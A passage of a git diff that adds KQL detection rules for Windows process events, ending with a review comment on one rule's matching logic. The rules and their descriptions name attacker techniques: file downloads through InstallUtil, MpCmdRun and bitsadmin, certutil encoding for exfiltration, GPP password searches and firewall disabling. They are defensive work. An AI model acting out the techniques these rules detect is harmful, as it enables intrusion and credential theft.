+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\InstallUtil.exe" or ProcessVersionInfoOriginalFileName =~ "InstallUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_via_windows_defender_mpcmprun_exe.kql b/KQL/rules/windows/process_creation/file_download_via_windows_defender_mpcmprun_exe.kql
new file mode 100644
index 00000000..a7430eb1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_via_windows_defender_mpcmprun_exe.kql
@@ -0,0 +1,10 @@
+// Title: File Download Via Windows Defender MpCmpRun.EXE
+// Author: Matthew Matchen
+// Date: 2020-09-04
+// Level: high
+// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "DownloadFile" and ProcessCommandLine contains "url") and (ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe" or FolderPath endswith "\\MpCmdRun.exe" or ProcessCommandLine contains "MpCmdRun.exe" or ProcessVersionInfoFileDescription =~ "Microsoft Malware Protection Command Line Utility")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_download_with_headless_browser.kql b/KQL/rules/windows/process_creation/file_download_with_headless_browser.kql
new file mode 100644
index 00000000..fc899b61
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_download_with_headless_browser.kql
@@ -0,0 +1,10 @@
+// Title: File Download with Headless Browser
+// Author: Sreeman, Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "--headless" and ProcessCommandLine contains "dump-dom" and ProcessCommandLine contains "http") and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")) and (not(((ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\MicrosoftEdge.exe") and (FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.MicrosoftEdge")) or (ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or FolderPath contains "\\Windows\\SystemApps\\Microsoft.MicrosoftEdge") and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\MicrosoftEdge.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_encoded_to_base64_via_certutil_exe.kql
new file mode 100644
index 00000000..a082c43e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_encoded_to_base64_via_certutil_exe.kql
@@ -0,0 +1,12 @@
+// Title: File Encoded To Base64 Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-02-24
+// Level: medium
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+// - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql b/KQL/rules/windows/process_creation/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql
new file mode 100644
index 00000000..c8c8fd94
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql
@@ -0,0 +1,10 @@
+// Title: File Encryption/Decryption Via Gpg4win From Suspicious Locations
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-11-30
+// Level: high
+// Description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-passphrase" and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoProductName =~ "GNU Privacy Guard (GnuPG)" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_encryption_using_gpg4win.kql b/KQL/rules/windows/process_creation/file_encryption_using_gpg4win.kql
new file mode 100644
index 00000000..482ba056
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_encryption_using_gpg4win.kql
@@ -0,0 +1,10 @@
+// Title: File Encryption Using Gpg4win
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-09
+// Level: medium
+// Description: Detects usage of Gpg4win to encrypt files
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql b/KQL/rules/windows/process_creation/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
new file mode 100644
index 00000000..557b39cc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql
@@ -0,0 +1,10 @@
+// Title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
+// Author: @Kostastsale
+// Date: 2022-12-22
+// Level: high
+// Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1135
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "shell:mycomputerfolder" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
new file mode 100644
index 00000000..11db1924
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Local\\Temp\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "$Recycle.Bin") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/file_recovery_from_backup_via_wbadmin_exe.kql
new file mode 100644
index 00000000..cd73bab1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_recovery_from_backup_via_wbadmin_exe.kql
@@ -0,0 +1,11 @@
+// Title: File Recovery From Backup Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects the recovery of files from backups via "wbadmin.exe".
+// Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/file_with_suspicious_extension_downloaded_via_bitsadmin.kql b/KQL/rules/windows/process_creation/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
new file mode 100644
index 00000000..4ffd38e6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
@@ -0,0 +1,10 @@
+// Title: File With Suspicious Extension Downloaded Via Bitsadmin
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/files_added_to_an_archive_using_rar_exe.kql b/KQL/rules/windows/process_creation/files_added_to_an_archive_using_rar_exe.kql
new file mode 100644
index 00000000..2c0d4451
--- /dev/null
+++ b/KQL/rules/windows/process_creation/files_added_to_an_archive_using_rar_exe.kql
@@ -0,0 +1,12 @@
+// Title: Files Added To An Archive Using Rar.EXE
+// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Highly likely if rar is a default archiver in the monitored environment.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " a " and FolderPath endswith "\\rar.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/filter_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/windows/process_creation/filter_driver_unloaded_via_fltmc_exe.kql
new file mode 100644
index 00000000..2af0dd67
--- /dev/null
+++ b/KQL/rules/windows/process_creation/filter_driver_unloaded_via_fltmc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Filter Driver Unloaded Via Fltmc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-13
+// Level: medium
+// Description: Detect filter driver unloading activity via fltmc.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")) and (not((((ProcessCommandLine endswith "unload rtp_filesystem_filter" or ProcessCommandLine endswith "unload rtp_filter") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\") and InitiatingProcessFolderPath endswith "\\endpoint-protection-installer-x64.tmp") or (ProcessCommandLine endswith "unload DFMFilter" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\ManageEngine\\uems_agent\\bin\\dcfaservice64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/findstr_gpp_passwords.kql b/KQL/rules/windows/process_creation/findstr_gpp_passwords.kql
new file mode 100644
index 00000000..1e6dc976
--- /dev/null
+++ b/KQL/rules/windows/process_creation/findstr_gpp_passwords.kql
@@ -0,0 +1,10 @@
+// Title: Findstr GPP Passwords
+// Author: frack113
+// Date: 2021-12-27
+// Level: high
+// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cpassword" and ProcessCommandLine contains "\\sysvol\\" and ProcessCommandLine contains ".xml") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/findstr_launching_lnk_file.kql b/KQL/rules/windows/process_creation/findstr_launching_lnk_file.kql
new file mode 100644
index 00000000..193ef27c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/findstr_launching_lnk_file.kql
@@ -0,0 +1,10 @@
+// Title: Findstr Launching .lnk File
+// Author: Trent Liffick
+// Date: 2020-05-01
+// Level: medium
+// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1202, attack.t1027.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".lnk" or ProcessCommandLine endswith ".lnk\"" or ProcessCommandLine endswith ".lnk'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/finger_exe_execution.kql b/KQL/rules/windows/process_creation/finger_exe_execution.kql
new file mode 100644
index 00000000..c5a6bfc0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/finger_exe_execution.kql
@@ -0,0 +1,14 @@
+// Title: Finger.EXE Execution
+// Author: Florian Roth (Nextron Systems), omkar72, oscd.community
+// Date: 2021-02-24
+// Level: high
+// Description: Detects execution of the "finger.exe" utility.
+// Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.
+// Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Admin activity (unclear what they do nowadays with finger.exe)
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "finger.exe" or FolderPath endswith "\\finger.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/firewall_configuration_discovery_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_configuration_discovery_via_netsh_exe.kql
new file mode 100644
index 00000000..5d1c1c84
--- /dev/null
+++ b/KQL/rules/windows/process_creation/firewall_configuration_discovery_via_netsh_exe.kql
@@ -0,0 +1,12 @@
+// Title: Firewall Configuration Discovery Via Netsh.EXE
+// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2021-12-07
+// Level: low
+// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "config " or ProcessCommandLine contains "state " or ProcessCommandLine contains "rule " or ProcessCommandLine contains "name=all") and (ProcessCommandLine contains "netsh" and ProcessCommandLine contains "show " and ProcessCommandLine contains "firewall ")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/firewall_disabled_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_disabled_via_netsh_exe.kql
new file mode 100644
index 00000000..926ed3d7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/firewall_disabled_via_netsh_exe.kql
@@ -0,0 +1,12 @@
+// Title: Firewall Disabled via Netsh.EXE
+// Author: Fatih Sirin
+// Date: 2019-11-01
+// Level: medium
+// Description: Detects netsh commands that turns off the Windows firewall
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004, attack.s0108
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "opmode" and ProcessCommandLine contains "disable") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "state" and ProcessCommandLine contains "off"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/firewall_rule_deleted_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_rule_deleted_via_netsh_exe.kql
new file mode 100644
index 00000000..7eff5b8e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/firewall_rule_deleted_via_netsh_exe.kql
@@ -0,0 +1,13 @@ +// Title: Firewall Rule Deleted Via Netsh.EXE +// Author: frack113 +// Date: 2022-08-14 +// Level: medium +// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activity +// - Software installations and removal + +DeviceProcessEvents +| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "delete ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall delete rule name=\"Avast Antivirus Admin Client\"" and InitiatingProcessFolderPath endswith "\\instup.exe") or (ProcessCommandLine contains "name=Dropbox" and InitiatingProcessFolderPath endswith "\\Dropbox.exe")))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/firewall_rule_update_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_rule_update_via_netsh_exe.kql new file mode 100644 index 00000000..36d47e3b --- /dev/null +++ b/KQL/rules/windows/process_creation/firewall_rule_update_via_netsh_exe.kql @@ -0,0 +1,13 @@ +// Title: Firewall Rule Update Via Netsh.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-18 +// Level: medium +// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate administration activity +// - Software installations and removal + +DeviceProcessEvents +| where (ProcessCommandLine contains " firewall " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql b/KQL/rules/windows/process_creation/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql new file mode 100644 index 00000000..43dbbbac --- /dev/null +++ b/KQL/rules/windows/process_creation/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql @@ -0,0 +1,11 @@ +// Title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2021-07-20 +// Level: medium +// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. +// An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1074.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath $env:TEMP") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains ":\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/forfiles_command_execution.kql b/KQL/rules/windows/process_creation/forfiles_command_execution.kql new file mode 100644 index 00000000..cbd7225c --- /dev/null +++ b/KQL/rules/windows/process_creation/forfiles_command_execution.kql 
@@ -0,0 +1,14 @@ +// Title: Forfiles Command Execution +// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2022-06-14 +// Level: medium +// Description: Detects the execution of "forfiles" with the "/c" flag. +// While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. +// Can be used to bypass application whitelisting. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use via a batch script or by an administrator. + +DeviceProcessEvents +| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and (FolderPath endswith "\\forfiles.exe" or ProcessVersionInfoOriginalFileName =~ "forfiles.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/forfiles_exe_child_process_masquerading.kql b/KQL/rules/windows/process_creation/forfiles_exe_child_process_masquerading.kql new file mode 100644 index 00000000..4d64af1a --- /dev/null +++ b/KQL/rules/windows/process_creation/forfiles_exe_child_process_masquerading.kql 
@@ -0,0 +1,10 @@ +// Title: Forfiles.EXE Child Process Masquerading +// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati +// Date: 2024-01-05 +// Level: high +// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (ProcessCommandLine startswith "/c echo \"" and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine endswith ".exe" or InitiatingProcessCommandLine endswith ".exe\"")) and (not(((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") and InitiatingProcessFolderPath endswith "\\forfiles.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/fsutil_drive_enumeration.kql b/KQL/rules/windows/process_creation/fsutil_drive_enumeration.kql new file mode 100644 index 00000000..8031cc61 --- /dev/null +++ b/KQL/rules/windows/process_creation/fsutil_drive_enumeration.kql @@ -0,0 +1,12 @@ +// Title: Fsutil Drive Enumeration +// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2022-03-29 +// Level: low +// Description: Attackers may leverage fsutil to enumerated connected drives. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1120 +// False Positives: +// - Certain software or administrative tasks may trigger false positives. + +DeviceProcessEvents +| where ProcessCommandLine contains "drives" and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/fsutil_suspicious_invocation.kql b/KQL/rules/windows/process_creation/fsutil_suspicious_invocation.kql new file mode 100644 index 00000000..982a1eb1 --- /dev/null +++ b/KQL/rules/windows/process_creation/fsutil_suspicious_invocation.kql @@ -0,0 +1,14 @@ +// Title: Fsutil Suspicious Invocation +// Author: Ecco, E.M. Anhaus, oscd.community +// Date: 2019-09-26 +// Level: high +// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). +// Might be used by ransomwares during the attack (seen by NotPetya and others). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1485 +// False Positives: +// - Admin activity +// - Scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql b/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql new file mode 100644 index 00000000..b43de036 --- /dev/null +++ b/KQL/rules/windows/process_creation/github_self_hosted_runner_execution.kql 
@@ -0,0 +1,18 @@
+// Title: Github Self-Hosted Runner Execution
+// Author: Daniel Koifman (KoifSec)
+// Date: 2025-11-29
+// Level: medium
+// Description: Detects GitHub self-hosted runners executing workflows on local infrastructure that could be abused for persistence and code execution.
+// Shai-Hulud is an npm supply chain worm targeting CI/CD environments.
+// It installs runners on compromised systems to maintain access after credential theft, leveraging their access to secrets and internal networks.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102.002, attack.t1071
+// False Positives:
+// - Legitimate GitHub self-hosted runner installations on designated CI/CD infrastructure
+// - Authorized runner deployments by DevOps/Platform teams following change management
+// - Scheduled runner updates or reconfigurations on existing build agents
+// - Self-hosted runners that follow expected/known naming patterns
+// - Installation via expected/known configuration management tools (reflected mostly as parent process name)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "spawnclient" and (FolderPath endswith "\\Runner.Worker.exe" or ProcessVersionInfoOriginalFileName =~ "Runner.Worker.dll")) or ((ProcessCommandLine contains "run" or ProcessCommandLine contains "configure") and (FolderPath endswith "\\Runner.Listener.exe" or ProcessVersionInfoOriginalFileName =~ "Runner.Listener.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/gpresult_display_group_policy_information.kql b/KQL/rules/windows/process_creation/gpresult_display_group_policy_information.kql
new file mode 100644
index 00000000..13b61f03
--- /dev/null
+++ b/KQL/rules/windows/process_creation/gpresult_display_group_policy_information.kql
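Review bot: The `ProcessCommandLine contains "run"` test in the second alternative is vacuous whenever the image gate passes: if ProcessCommandLine carries the executable name, as it normally does in DeviceProcessEvents, `Runner.Listener.exe` itself contains "run", so every Runner.Listener launch matches regardless of the verb it was given. Term matching makes only the argument count: `(ProcessCommandLine has "run" or ProcessCommandLine has "configure")`, since `has` does not match "run" inside "Runner". The Runner.Worker branch is unaffected because "spawnclient" does not occur in the image name.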
